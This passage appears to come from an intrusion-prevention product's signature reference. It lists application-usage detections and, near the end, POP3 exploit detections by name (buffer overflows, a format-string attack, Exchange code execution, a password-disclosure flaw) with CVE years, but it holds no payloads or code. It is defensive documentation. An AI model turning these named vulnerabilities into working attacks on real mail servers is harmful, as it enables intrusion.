Description: PingFu Iris is a HTTP Tunneling software which is used by users behind restrictive firewalls and proxy servers to bypass firewall or proxy servers.
Back to top

PingOne

About this situation: PingOne usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-699-5211
Last changed: sgpkg-ips-1764-5242
Description: PingOne is an identity as a service (IDaaS) solution.
Back to top

Pinkerton

About this situation: Application Pinkerton detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Pinkerton offers organizations a range of corporate risk management services from security consulting and investigations to executive protection, employment screening and protective intelligence.
Back to top

Pinterest

About this situation: Pinterest usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-521-5211
Last changed: sgpkg-ips-1769-5242
Description: Pinterest is a social web service that allows users to store and share content.
Back to top

Pipedrive

About this situation: Pipedrive usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, ERP/CRM, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: This software provides users CRM-replacing deal management tools on computers and mobile devices.
Back to top

Pipelinedeals

About this situation: PipelineDeals usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, ERP/CRM, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: PipelineDeals ia a Customer relationship management and sales CRM software to organize, track, and manage your deals, leads, and contacts.
Back to top

Piston-Cloud

About this situation: Application Piston-Cloud detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Piston OpenStack automates the orchestration of an entire private cloud environment on commodity servers.
Back to top

Pitney-Bowes

About this situation: Pitney Bowes usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1278-5242
Description: Pitney Bowes offers postage meters, mail machines, shipping, address mapping and geo location software and small business mailing and marketing solutions.
Back to top

Pivotal

About this situation: Application Pivotal detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Pivotal's cloud native platform provides software and services for the development of custom applications for data and analytics based on cloud computing technology.
Back to top

Pivotaltracker

About this situation: PivotalTracker usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-626-5211
Last changed: sgpkg-ips-1764-5242
Description: PivotalTracker is a lightweight, agile project management tool for software teams.
Back to top

PivotPoint-SharePoint-Webpart

About this situation: Application PivotPoint-SharePoint-Webpart detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Pentalogic PivotPoint web part for SharePoint provides analysis of the numerical data in your SharePoint lists, with no need to link to Excel.
Back to top

Piwik-PRO

About this situation: Application Piwik-PRO detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Piwik PRO is an analytics and tag management suite tailored to the individual needs of enterprise clients.
Back to top

Pixabay

About this situation: Application Pixabay detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Pixabay is an online service that offers high quality photos, illustrations, and vector graphics.
Back to top

Pixagogo

About this situation: Pixagogo usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Photo/Video Sharing, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A web-based photo-sharing where users can share or view shared pictures using just a web browser.
Back to top

Pixiclip

About this situation: Application Pixiclip detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Office, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Pixiclip's web-based whiteboard. Allow create and share sketches online.
Back to top

Pixlr

About this situation: Application Pixlr detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Pixlr is a cloud-based set of image tools and utilities, including a number of photo editors, a screen grabber browser extension, and a photo sharing service.
Back to top

Pixopa

About this situation: Application Pixopa detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Pixopa is a web-to-print eCommerce solution for printing companies or resellers to sell hundreds of personalizable products.
Back to top

Pixplit

About this situation: Pixplit usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A creative collaboration network for friends to create images together in a single frame using their smartphones.
Back to top

Pixton

About this situation: Application Pixton detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Pixton is a comic-making tool and community.
Back to top

Pizap

About this situation: Application Pizap detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: piZap.com is online photo editor, add graphics, easy effects, collages, edit Facebook and Instagram photos and webcam effects.
Back to top

Planbox

About this situation: Application Planbox detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Planbox is an agile project management tool, ppm tool, made for all teams and all projects: development, marketing and more. The project application has many features, is customizable, simple, powerful and lets you plan, assign, collaborate track and deliver.
Back to top

Plancast

About this situation: Plancast usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-431-4219
Last changed: sgpkg-ips-630-5211
Description: Plancast helps users find out about events and other social activities ahead of time and share the most interesting things on their calendars.
Back to top

Plandone

About this situation: PlanDone usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-713-5211
Last changed: sgpkg-ips-1764-5242
Description: PlanDone is an on demand, hosted, Software as a Service (SaaS), project planning, task executing, team managing, time tracking, report generating, document sharing, cloud collaborating productivity tool designed for people to communicate and to work together more efficiently and effectively. Teams break large projects and tasks into small pieces or action steps to delegate and to share in order to meet or beat deadlines.
Back to top

Planet-DDS

About this situation: Application Planet-DDS detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Planet DDS provides cloud-based dental software. The company's Denticon practice management software is a tool by thousands of dental professionals across the country. Planet DDS also offers outsourced business services to dental offices.
Back to top

PlanGrid

About this situation: Application PlanGrid detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: PlanGrid is construction software made for the field. Architects and contractors use PlanGrid to collaborate on project plans, specs, photos, RFIs, and punchlists using desktop or mobile devices in real-time, from just about anywhere.
Back to top

PlanGuru

About this situation: Application PlanGuru detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: PlanGuru business planning software offers the budgeting and forecasting tool of choice designed to help businesses and nonprofits make better decisions
Back to top

PlanHQ

About this situation: Application PlanHQ detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: PlanHQ offers a browser based business plan builder and project manager aimed at the small niche of venture capital. The product allows users to more easily track project goals and overall objectives in a collaborative online interface.
Back to top

Planio

About this situation: Application Planio detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Planio provides web based project management and team collaboration..
Back to top

Planisware

About this situation: Application Planisware detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Planisware is a provider of Program, Product and Project Portfolio Management software designed for product development and R and D organizations.
Back to top

PlannerX

About this situation: Application PlannerX detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: PlannerX manages your Basecamp project plan from a single screen.Add, update, delete milestones, to-do lists and to-do items in a simple outline view. Navigate with keyboard, use shorthand for dates and assignees, update in batch, export and import.
Back to top

Planning-Center

About this situation: Application Planning-Center detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Office, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: PlanningCenterOnline.com is way to plan and organize your services, schedule your teams, store media.
Back to top

PlanPlusOnline

About this situation: Application PlanPlusOnline detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: PlanPlus Online - software solutions to assist modern-day companies with handling project management, improving productivity, and building customer relationships.
Back to top

PlanSource-Benefits

About this situation: Application PlanSource-Benefits detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: PLANSOURCE works directly with insurance brokers, carriers and employers to provide outsourced benefits administration software and HR solutions.
Back to top

Plantune

About this situation: Application Plantune detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Plantune - advanced planning and scheduling (APS) system delivered as a cloud application service.
Back to top

PlanView

About this situation: Application PlanView detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Planview is a global leader in portfolio and resource management, helping organizations drive results by optimizing the capacity of their finite people and financial resources. Market leaders across every industry rely on the company's enterprise cloud solutions to manage portfolios across IT, product development, services and finance.
Back to top

Planzone

About this situation: Application Planzone detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Planzone is an on-line collaboration and project management service intended for teams of professionals working in project mode.
Back to top

Platfora

About this situation: Application Platfora detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Platfora is technology mixes customer interaction, machine and transactional data for infinite correlations across an infinite amount of data so that enterprises can meet and exceed their business goals in the Fact-based Economy.
Back to top

Platformax

About this situation: Application Platformax detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Platformax helps people promoting their business, personal profile and a station that has variety field of business come together no matter what industry they are.The All-in-one CRM, projects and customer support app for web agencies.
Back to top

PLATO

About this situation: Application PLATO detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Plato is a focused, boutique Australian equities manager specialising in distinctive accumulation, pension and absolute return strategies
Back to top

Playdom

About this situation: Playdom usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: Playdom, the social games product group of Disney Interactive, makes some of the most popular online Flash games around.
Back to top

Playok

About this situation: PlayOK usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A Web-based Gaming service where users can play games or get gaming information online using a web browser.
Back to top

PlayVox

About this situation: Application PlayVox detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: PlayVox is a software as a service (SaaS)-based company that focuses on providing Gamified Workforce Engagement Software for Sales, Service and Support Contact Centers. PlayVox helps companies like Groupon and Telefonica maximize sales and service performance and reduce agent training costs and onboarding from weeks to hours.
Back to top

Pledgecents

About this situation: Application Pledgecents detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: PledgeCents provide better education for children all over the world. Specifically, PledgeCents is focused on providing an alternative means of school fundraising that goes beyond the limitations of conventional fundraising methods.
Back to top

Plentyoftorrents.com

About this situation: plentyoftorrents.com usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, P2P, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A p2p download service that allows users to search for torrent files for various types of content such as pirated software, movies, and music.
Back to top

Plex

About this situation: Plex usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-437-4219
Last changed: sgpkg-ips-1638-5242
Description: Plex is a freeware media sharing and player software.
Back to top

Plex-Online

About this situation: Application Plex-Online detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Plex offers the industry's leading cloud-delivered ERP software for manufacturing. Learn why Plex excels in SaaS ERP for a wide range of industries.
Back to top

Plogger.org

About this situation: plogger.org usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Photo/Video Sharing, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A web-based photo-sharing where users can share or view shared pictures using just a web browser.
Back to top

Plone

About this situation: Application Plone detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Plone is open source content management system built on top of the Zope application server. In principle, Plone can be used for any kind of website, including blogs, internet sites, webshops and internal websites.
Back to top

Plum-Voice

About this situation: Application Plum-Voice detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: The Plum Group provides interactive voice response
Back to top

Plurk

About this situation: Plurk usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-392-4219
Last changed: sgpkg-ips-630-5211
Description: Plurk is a free social networking and micro-blogging service that allows users to send updates through short messages or links.
Back to top

PlusOne-Health-Management

About this situation: PlusOne Health Management usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Health, Application Routing
First detected in: sgpkg-ips-600-5211
Last changed: sgpkg-ips-754-5211
Description: PlusOne provides online services for health and wellness management.
Back to top

pme.box

About this situation: Application pme.box detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: PMEBOX S.A. commercially explores cloud business software and sevices for SMB and SME.
Back to top

PMRobot

About this situation: Application PMRobot detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: PMRobot - Bug Tracking, Client Collaboration and Agile Project Management Software
Back to top

PNG File

About this situation: PNG file detected
Context: File Stream Redirection
Severity: 2
Tags: File Type Identification, Content Identification, Media File, PNG Image
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-409-4219
Description:
Back to top

Pobox

About this situation: Application Pobox detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Pobox is a service that provides email solution.
Back to top

Pocket

About this situation: Application Pocket detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Pocket, the premier Save for Later app, lets you consume and share content whenever you want, wherever you want, even without an internet connection.
Back to top

Pocketsmith

About this situation: Application Pocketsmith detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: PocketSmith is online money management software that's used in 196 countries. We specialize in personal financial forecasting and a visual approach to budgeting, with live bank feeds available for users in the US, UK and Australasia.
Back to top

Poczta-o2

About this situation: Application Poczta-o2 detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Poczta o2 - post office, available on all devices. It has 100 MB attachments, 30GB storage capacity, effective anti-spam, segregation news.
Back to top

Podbox

About this situation: Application Podbox detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Podbox is an integration platform as a service
Back to top

Podio

About this situation: Podio usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-567-5211
Last changed: sgpkg-ips-1764-5242
Description: This service allows user to organize team communication, business processes, data and content in project management workspaces. Users can also select business applications from an online app store or build their own according to project needs. Source: Wikipedia
Back to top

PodOmatic

About this situation: Application PodOmatic detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: PodOmatic is a directory of independent podcasters, including DJs, talk shows, educational programs, and more.
Back to top

Pogo

About this situation: Pogo usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-629-5211
Description: Pogo.com is a gaming website that offers a variety of free casual games, from card and board games to puzzle, sports, and word games. (Source:Wikipedia)
Back to top

Pogoplug

About this situation: Pogoplug usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Storage, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: Pogoplug is a proprietary hybrid cloud technologies meld offsite archival storage with Pogoplug-enabled storage in the home or office. It provides multi-user cloud backup solution, with instant access and sharing from anywhere on the Internet.
Back to top

Poimapper

About this situation: Application Poimapper detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Poimapper is field data collection, sharing and analysing software. Mobile application is used to collect data and update data. By uploading data to a cloud server it is shared among other mobile and office workers.
Back to top

PointAcross

About this situation: Application PointAcross detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: PointAcross is a marketing platform that helps the hospitality industry and their sales teams create personalized, engaging video messages - enabling them to connect directly with the prospects that really matter.
Back to top

PointClickCare

About this situation: Application PointClickCare detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: PointClickCare, helps long-term care providers, from single-home independents to national chains, manage the complete lifecycle of resident care.
Back to top

PointHQ

About this situation: Application PointHQ detected
Context: Application Context
Severity: 1
Tags: Web Applications, Storage
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: PointDNS provides DNS hosting solutions. The company enables users to manage various domains from interface, add unlimited A, AAAA, CNAME, MX, SRV, or TXT records to zones
Back to top

PointRoll

About this situation: PointRoll usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Statistics, Application Routing
First detected in: sgpkg-ips-623-5211
Last changed: sgpkg-ips-623-5211
Description: PointRoll is a company specialized in advertising.
Back to top

Pokemon-Go

About this situation: Pokemon Go usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-780-5211
Last changed: sgpkg-ips-780-5211
Description: Pokemon Go usage detected. Pokemon Go is a popular augmented reality game from Niantic Labs.
Back to top

PokerStars

About this situation: PokerStars traffic
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-470-5211
Last changed: sgpkg-ips-630-5211
Description: PokerStars is the world's largest online poker room which has many poker games at every level, bigger tournaments and lots of players.
Back to top

Polarion-Software

About this situation: Application Polarion-Software detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Siemens PLM Software, a business unit of the Siemens Digital Factory Division, is a global provider of product lifecycle management
Back to top

Political Organizations

About this situation: Sites sponsored by or providing information about political parties and interest groups focused on elections or legislation.
Context: URL Application Context
Severity: 1
Tags: Government, Productivity Loss, Private Data
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites sponsored by or providing information about political parties and interest groups focused on elections or legislation.
Back to top

Poll-Everywhere

About this situation: Poll Everywhere usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-645-5211
Last changed: sgpkg-ips-1764-5242
Description: Poll Everywhere is an online service for classroom response and audience response systems. It allows to engage audiences and classrooms anywhere in real time using mobile phones, Twitter, or web browsers and then see the response live on the web or in a PowerPoint presentationin. Poll Everywhere replaces expensive proprietary audience response hardware with standard web technology
Back to top

Polldaddy

About this situation: Application Polldaddy detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Polldaddy allows create stunning surveys, polls, and quizzes in minutes. Collect responses via your website, e-mail, iPad, Facebook, and Twitter. Generate and share easy-to-read reports.
Back to top

Poloniex

About this situation: Poloniex usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Finance, Application Routing
First detected in: sgpkg-ips-773-5211
Last changed: sgpkg-ips-1238-5242
Description: Poloniex is a public virtual currency exchange, allwing trading with for example Bitcoin and other similar currencies.
Back to top

Polygon

About this situation: Polygon usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-602-5211
Last changed: sgpkg-ips-1764-5242
Description: Polygon usage detected. Polygon is a video gaming news site operated by Vox Media.
Back to top

Pontofrio.com

About this situation: Application Pontofrio.com detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Pontofrio.com is a company operates in the lease, providing credit to finance the products that are traded on Globex SA.
Back to top

POP-Pankki

About this situation: POP-Pankki usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Finance, Application Routing
First detected in: sgpkg-ips-623-5211
Last changed: sgpkg-ips-1764-5242
Description: POP-Pankki usage detected. POP-Pankki is a Finnish bank.
Back to top

POP3

About this situation: Post Office Protocol 3 (POP3) traffic
Context: Application Context
Severity: 1
Tags: Protocols, Mail, Application Routing
First detected in: sgpkg-ips-450-4333
Last changed: sgpkg-ips-1190-5242
Description: Post Office Protocol 3 (POP3) usage. POP3 is an application layer Internet standard protocol to retrieve e-mail from a remote server over a TCP/IP connection. It is one of the most prevalent Internet standard protocols for e-mail retrieval.
Back to top

POP3_Authentication-Request

About this situation: A POP3 PASS, APOP or AUTH command was seen
Context: POP3 Client Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Generic POP3 client, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-406-4219
Last changed: sgpkg-ips-406-4219
Description:
Back to top

POP3_Client-Syntax-Error

About this situation: POP3 client request could not be understood
Context: POP3 without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-154-2032
Last changed: sgpkg-ips-1531-5242
Description: The POP3 client request could not be parsed. This can be caused by a client that does not follow the POP3 protocol specification, or if the connection does not use POP3 at all. As such, this situation is probably not very severe. However, the rest of the data sent by the client in this connection may be inspected only partially, because the protocol state has been lost.
Back to top

POP3_CS-Generic-Buffer-Overflow-Attack

About this situation: Buffer overflow attempt in POP3
Context: POP3 Client Stream
Severity: 10
Tags: Any Operating System, x86, CVE1999, Any Operating System not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-261-3038
Last changed: sgpkg-ips-720-5211
Vulnerability: POP3-Qualcomm-QPopper-BOF
Description:
Back to top

POP3_CS-Microsoft-Exchange-Calendar-Code-Execution

About this situation: Detects Microsoft Exchange Server 2000 and 2003 Calendar exploit
Context: POP3 Client Stream
Severity: 7
Tags: Windows, Any Hardware, Exchange Server 2003, Exchange Server 2000, MS2006-05, CVE2006, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-115-2032
Last changed: sgpkg-ips-277-4219
Vulnerability: Microsoft-Exchange-Calendar-Code-Execution
Description:
Back to top

POP3_CS-Suspicious-Packet

About this situation: A suspicious traffic pattern detected.
Context: POP3 Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-538-5211
Last changed: sgpkg-ips-538-5211
Vulnerability: Generic-HTTP-Exploit
Description:
Back to top

POP3_Dovecot-SASL-Authentication-Component-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Dovecot detected
Context: POP3 Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Dovecot, CVE2016, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-863-5242
Last changed: sgpkg-ips-863-5242
Vulnerability: Dovecot-SASL-Authentication-Component-Denial-Of-Service
Description:
Back to top

POP3_E-Post-Mail-Server-POP3-Password-Disclosure-Buffer-Overflow

About this situation: Attempt to exploit an information disclosure vulnerability in the E-Post Mail Server POP3 service detected
Context: POP3 Client Stream
Severity: 2
Tags: Windows, Any Hardware, E-Post Mail Server Enterprise, E-Post Mail Server, E-POST EPSTPOP3S.EXE, CVE2008, Windows not specific, Potential Disclosure, TCP Client Traffic
First detected in: sgpkg-ips-157-2032
Last changed: sgpkg-ips-157-2032
Vulnerability: POP3-E-Post-Mail-Server-POP3-Password-Disclosure-Buffer-Overflow
Description:
Back to top

POP3_Err-Response

About this situation: POP3 ERR response message detected
Context: POP3 Server Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Generic POP3 server, Any Operating System not specific, Protocol Information, TCP Server Traffic
First detected in: sgpkg-ips-406-4219
Last changed: sgpkg-ips-406-4219
Description:
Back to top

POP3_Format-String-Specifiers-In-Argument-To-Pass

About this situation: Detects format string specifiers in arguments to the PASS command
Context: POP3 Client Stream
Severity: 7
Tags: Windows, x86, Magic Winmail Server, CVE2003, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-279-4219
Last changed: sgpkg-ips-720-5211
Vulnerability: Magic-Winmail-Server-Pass-Format-String-Vuln
Description:
Back to top

POP3_MailEnable-POP-Service-Pass-Command-Buffer-Overflow

About this situation: Buffer overflow attempt in PASS command against MailEnable
Context: POP3 Client Stream
Severity: 7
Tags: Windows, Any Hardware, MailEnable, CVE2003, CVE2006, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-90-1314
Last changed: sgpkg-ips-148-2032
Vulnerability: SLMail-POP3-Server-Password-BOF
POP3-MailEnable-POP-Service-Pass-Command-Buffer-Overflow
Description:
Back to top

POP3_MDaemon-POP3-Server-Apop-Command-Buffer-Overflow

About this situation: Buffer overflow attempt in POP3 APOP command against MDaemon
Context: POP3 Client Stream
Severity: 7
Tags: Windows, x86, MDaemon, CVE2006, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-77-1314
Last changed: sgpkg-ips-148-2032
Vulnerability: POP3-MDaemon-POP3-Server-User-And-Apop-Commands-Buffer-Overflow
Description:
Back to top

POP3_Novell-eDirectory-CVE-2006-5478

About this situation: An attempt to exploit a vulnerability in Novell eDirectory
Context: POP3 Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Novell eDirectory, CVE2006, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-496-5211
Last changed: sgpkg-ips-496-5211
Vulnerability: HTTP-Novell-eDirectory-HTTP-Server-Redirection-Buffer-Overflow
Description:
Back to top

POP3_Server-Shared-Variables

About this situation: This fingerprint sets shared variables
Context: POP3 Server Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, System Inspections, TCP Server Traffic
First detected in: sgpkg-ips-1321-5242
Last changed: sgpkg-ips-1322-5242
